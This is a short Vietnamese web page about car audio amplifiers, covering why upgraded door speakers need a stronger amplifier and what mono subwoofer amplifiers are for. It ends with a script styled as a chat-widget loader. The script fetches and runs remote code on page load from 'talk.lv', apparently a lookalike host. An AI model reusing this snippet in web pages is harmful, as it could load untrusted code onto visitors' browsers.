Amply

Amply ô tô là một thiết bị khá quan trọng trong hệ thống âm thanh xe hơi. Là một trong những thành phần cần thiết nếu bạn có nhu cầu thưởng thức một chất lượng âm thanh hay trên xe của bạn.

Khi nâng cấp hệ thống âm thanh, chắc chắn bạn sẽ muốn thay thế hệ thống loa cánh cửa với những loa có công suất lớn để đảm bảo chất âm tốt nhất. Tuy nhiên với hệ thống loa cánh cửa mới với công suất cao như vậy, đầu CD/DVD hay amply nguyên bản trên xe sẽ không thể đảm nhiệm được việc cung cấp đủ công suất. Vì vậy việc đầu tư một chiếc amply ô tô với công suất lớn hơn là hoàn toàn cần thiết.

Ngoài amply dùng để kéo công suất cho hệ thống loa cánh cửa, trên thị trường còn có amply mono, là dòng sản phẩm chuyên dụng để kéo công suất cho sub hơi – dòng sub siêu trầm trên ô tô.

var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date(); (function(){ var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0]; s1.async=true; s1.src='https://embed.talk.lv/666d0cb9bc592c18a31f4fa4/1i0cvjdor'; s1.charset='UTF-8'; s1.setAttribute('crossorigin','*'); s0.parentNode.insertBefore(s1,s0); })();